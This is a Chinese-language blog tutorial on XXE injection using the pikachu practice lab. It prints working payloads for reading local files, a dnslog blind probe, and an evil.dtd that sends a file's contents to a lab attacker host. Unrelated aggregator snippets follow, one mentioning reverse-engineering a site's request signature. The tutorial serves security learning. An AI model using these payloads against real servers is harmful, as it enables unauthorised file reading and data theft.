XXE漏洞原理和pikachu靶场实验

★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

1、XXE漏洞原理

XXE全称:XML External Entity Injection,XML外部实体注入。XXE漏洞主要是由于危险的外部实体引用和未对外部实体进行敏感字符的过滤,从而造成命令执行、目录遍历等。攻击者通过构造恶意的外部实体,当解析器解析包含“恶意”外部实体的XML类型文件,就会导致XXE攻击。

摘自百度百科

XML全称:Extensible Markup Language,可扩展标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。

2、XXE的危害

1、导致可加载恶意外部文件、读取任意未授权文件,

2、恶意消耗内存进行DOS攻击,

3、探测内网信息,比如检测服务、内网端口扫描、攻击内网网站等,

4、命令执行、目录遍历等,

5、由于有些XML解析库支持列目录,攻击者通过列目录、读文件,获取账号密码后进一步攻击,比如读取tomcat-users.xml得到账号密码后登录tomcat的manager部署webshell。

3、XML分类

XXE的攻击方式分为两种:显示攻击和盲攻击。

**显示攻击: **攻击者可通过正常的回显将外部实体的内容读取出来;

盲攻击: 不显示外部实体的内容,可利用参数实体将本地文件内容读出来,作为URL参数向它指定服务器发起请求,然后在它指定服务器的日志中读取文件的内容。

4、pikachu靶场实验

4.0、环境准备

靶场环境搭建详参考《靶场环境搭建【XP、pikachu、dvwa、sqli-labs】》

4.1、普通实体

把这些xml代码放到文本框提交

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe "你今天真好看">
]>
<foo>&xxe;</foo>

提交结果

在这里插入图片描述

4.2、外部引用

把这些xml代码放到文本框提交

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/windows/win.ini">
]>
<foo>&xxe;</foo>

提交结果

在这里插入图片描述

4.3、盲注-利用dnslog

当没有回显提示信息时,可利用dnslog判断是否存在xxe漏洞。使用外部引用,在路径填写dnslog路径,然后在dnslog网站查看。

访问:https://dnslog.org/,点击Get Sub Domain按钮获取子域名放到xml代码

在这里插入图片描述

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://108c09f2.dnslog.store">
]>
<foo>&xxe;</foo>

提交后到https://dnslog.org/,点击Get Results查看注入结果,表示xxe注入成功

在这里插入图片描述

4.5、借助kali模拟攻击
4.5.0、前置说明

针对没有回显的,需要VPS(Virtual Private Server,虚拟专用服务器,简称VPS),这里使用kali模拟。

环境说明

攻击机kali(虚拟机):192.168.242.4
靶机win7(虚拟机):192.168.242.6
4.5.1 、kali开启http服务

使用python快速开启http服务,注入先使用sudo su命令切换到管理员权限。

python3 -m http.server 80

在这里插入图片描述

4.5.2、kali创建evil.dtd

先在自己电脑本机创建evil.dtd,内容如下,

<!ENTITY % file SYSTEM "php://fiter/reader=convert.base64-encode/resource=file:///xxe.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.242.4?c=%file;'>">

创建一个文本xxe.txt,里面写123或自己任意写内容,和evil.dtd一起复制到kali的系统目录下:/home/kali

在这里插入图片描述

4.5.3、win7系统测试

可以直接在浏览器访问:http://192.168.242.4/evil.dtd,会看到目录展示和下载evil.dtd。

在这里插入图片描述

pikachu使用下面的xml提交,

<!DOCTYPE convert[
        <!ENTITY % remote SYSTEM "http://192.168.242.4/evil.dtd">
        %remote;%int;%send;
]>
4.5.4、kali看数据读取成功

在这里插入图片描述

5、资料获取

如果需要kali和win7系统虚拟机,进行实验的话(如果在渗透测试实战已有下载过,不需要再下载了),请关注我的公众号:大象只为你,后台回复:虚拟机。文件有些大下载耗时会比较久。

6、下期内容预告

《跟我学网安知识》系列文章截止目前已分享49篇啦,也接近尾声了,还有内网一些知识,由于我还未整理成笔记,下周三要参加CISP考试和自己其他一些事情要忙,本周先暂时分享XXE这一篇。预计在下周六/日分享内网的知识点,内网部分可能大约2~3篇左右就结束了。

后面还会再分享技术文章,可能是Java专题系列,或自己挖漏洞的分享,来倒逼自己产出和学习,敬请关注我的公众号:大象只为你。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/462484.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

YOLOv9更换iou|包含CIoU、DIoU、MDPIoU、GIoU

专栏介绍&#xff1a;YOLOv9改进系列 | 包含深度学习最新创新&#xff0c;助力高效涨点&#xff01;&#xff01;&#xff01; 一、改进点介绍 更换YOLOv9中使用的Iou计算方式&#xff0c;目前支持CIoU、DIoU、MDPIoU、GIoU。 二、Iou模块详解 2.1 模块简介 Iou的主要思想&…

【Poi-tl Documentation】自定义行删除标签

前置说明&#xff1a; <dependency><groupId>com.deepoove</groupId><artifactId>poi-tl</artifactId><version>1.12.1</version> </dependency>模板样式&#xff1a; 删除行表格测试.docx 实现思路&#xff1a;通过定制占位…

ctfshow(WEB AK赛)

目录 web-观己 web1-观字 web2-观星 web3-观图 web4-观心 过程and分析 web-观己 没啥难的有include 想着伪协议 但是过滤了php 那就是用file为协议读取本地文件 全靠猜 <?php if(isset($_GET[file])){$file $_GET[file];if(preg_match(/php/i, $file)){die(error);}…

win下 VirtualBox 自动启动脚本脚本

文章目录 一、找到VBoxManage二、测试脚本1、打开cmd2、输入命令 (直接把上面找到的VBoxManage.exe 拖入到cmd中&#xff0c;这样就不用输入路径了)3、效果展示 比如虚拟机中的系统名称叫“centos-mini” 三、设置自动启动脚本1、复制刚才测试好的命令到新建文本中2、修改文本名…

SpringBoot整合Seata注册到Nacos服务

项目引入pom文件 <!-- SpringCloud Seata 组件--> <dependency><groupId>com.alibaba.cloud</groupId><artifactId>spring-cloud-alibaba-seata</artifactId><version>${alibaba.seata}</version><exclusions><exc…

Vintage账龄分析表计算底层逻辑(Python实操)

大家好&#xff0c;我是东哥。 信贷风控领域中&#xff0c;经常用到账龄Vintage报表&#xff0c;这是入门初学者的难点之一&#xff0c;因为它涉及到用户还款、逾期等多种行为以及业务上的多种统计口径&#xff0c;因此很多朋友一直无法将逻辑梳理清楚。本次来给大家详细介绍V…

计算机系统基础 2 Intel 中央处理器

Intel微处理器的发展史 INTegrated ELectronics&#xff08;集成电子&#xff09;的缩写 先后推出的中央处理器&#xff1a; Intel4004、Intel8008、Intel8080/8085、8086/8088、80186、80286、i386、i486 Pentium&#xff08;奔腾&#xff09;、Pentium II、Pentium III、Pen…

布局Uniswap(UNI)的基本逻辑和bitget钱包使用教程

我们都知道&#xff0c;牛市里板块轮动是很明显的&#xff0c;这个概念涨完下一个概念涨&#xff01; 背后本质是场内的筹码在交换的过程&#xff0c;抓住这种交换的规律&#xff0c;可以大大提高资金的使用效率和总体收益&#xff01; 目前行情继续稳中有进&#xff0c;大饼也…

html--花瓣

代码 <!DOCTYPE html> <html lang"en" ><head> <meta charset"UTF-8"> <title>Petals</title><link rel"stylesheet" href"css/style.css"></head><body><div class"…

记录工作中莫名其妙的bug

1、问题&#xff1a;办公室的电脑突然除了我之外&#xff0c;都不能访问我们的线上系统了 原因&#xff1a;因为是内网&#xff0c;同事有刚刚升级了Windows11&#xff0c;配置的DNS被清了&#xff0c;还有同事换了公司的新电脑&#xff0c;还没有配DNS 位于&#xff1a;C /Win…

postman---postman参数化

我们在做接口测试的过程中&#xff0c;都会遇到同一个接口不同的数据&#xff0c;每次去一个个填写数据就太麻烦了&#xff0c;今天我们一起学习下如何通过postman进行参数化 一、参数化 参数化就是1个接口请求不同的数据&#xff0c;我们可以通过把请求的数据放入到一个文件…

创业板指399006行情数据API接口

# 测试&#xff1a;返回不超过10条数据&#xff08;2年历史&#xff09; https://tsanghi.com/api/fin/index/CHN/daily?tokendemo&ticker399006&order2Python示例 import requestsurl f"https://tsanghi.com/api/fin/index/CHN/daily?tokendemo&ticker399…

某团mtgsig1.1和_token逆向

前言 只作学习研究&#xff0c;禁止用于非法用途&#xff0c;否则后果自负&#xff0c;如有侵权&#xff0c;请告知删除&#xff0c;谢谢&#xff01; 目前已成功逆向&#xff01;&#xff01; 1.1版本适用于h5和小程序 使用python调用js逆向脚本&#xff0c;获取mtgsig 效…

【Python使用】python高级进阶知识md总结第4篇:静态Web服务器-命令行启动动态绑定端口号,html 的介绍【附代码文档】

python高级进阶全知识知识笔记总结完整教程&#xff08;附代码资料&#xff09;主要内容讲述&#xff1a;操作系统&#xff0c;虚拟机软件&#xff0c;Ubuntu操作系统&#xff0c;Linux内核及发行版&#xff0c;查看目录命令&#xff0c;切换目录命令&#xff0c;绝对路径和相对…

AI健身教练-引体向上-俯卧撑计数-仰卧起坐姿态估计-康复训练姿态识别-姿态矫正

在AI健身应用中&#xff0c;通过关键点检测技术可以实现对用户动作的精准捕捉和分析&#xff0c;从而进行统计计数和规范性姿态识别。 统计计数&#xff1a;比如在做瑜伽、健身操等运动时&#xff0c;系统可以通过对人体关键点&#xff08;如手部、脚部、关节等&#xff09;的…

Xinstall助力web唤起iOS,打破平台壁垒,实现无缝跳转

在移动互联网时代&#xff0c;web与App之间的跳转已成为用户日常使用中不可或缺的一部分。然而&#xff0c;对于iOS系统的用户来说&#xff0c;web唤起App的过程往往充满了挑战和不便。这时&#xff0c;Xinstall作为一款专业的移动开发者服务工具&#xff0c;为开发者们提供了解…

分析型数据库的主要使用场景有哪些?

如今数据已经成为了企业和组织的核心资产。如何有效地管理和利用这些数据&#xff0c;成为了决定竞争力的关键。分析型数据库作为数据处理领域的重要工具&#xff0c;为各行各业提供了强大的数据分析和洞察能力。基于分析型数据库&#xff08;Apache Doris &#xff09;构建的现…

2核4G云服务器能支持多少人同时访问?性能测评来了

腾讯云轻量2核4G5M带宽服务器支持多少人在线访问&#xff1f;5M带宽下载速度峰值可达640KB/秒&#xff0c;阿腾云以搭建网站为例&#xff0c;假设优化后平均大小为60KB&#xff0c;则5M带宽可支撑10个用户同时在1秒内打开网站&#xff0c;并发数为10&#xff0c;经阿腾云测试&a…

支付模块-基于消息队列发送支付通知消息

消息队列发送支付通知消息 需求分析 订单服务作为通用服务&#xff0c;在订单支付成功后需要将支付结果异步通知给其他对接的微服务&#xff0c;微服务收到支付结果根据订单的类型去更新自己的业务数据 技术方案 使用消息队列进行异步通知需要保证消息的可靠性即生产端将消息…

【echarts中解决适配窗口大小的问题】

适配窗口大小 一、基础适配方案&#xff1a;remflexible.js布局二、echart图表适配1.resize函数2.使用resize的前提&#xff01;重点&#xff01;不然resize极有可能失效 一、基础适配方案&#xff1a;remflexible.js布局 vscode插件&#xff1a;cssrem 编写好的less文件保存后…